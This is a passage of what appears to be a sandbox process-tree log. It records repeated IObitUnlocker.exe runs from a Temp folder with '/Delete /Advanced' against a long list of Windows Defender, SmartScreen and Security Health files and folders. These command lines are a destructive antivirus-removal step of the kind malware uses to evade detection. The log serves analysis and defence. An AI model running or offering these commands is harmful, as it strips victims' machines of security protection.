Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:12012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:11652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11596
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
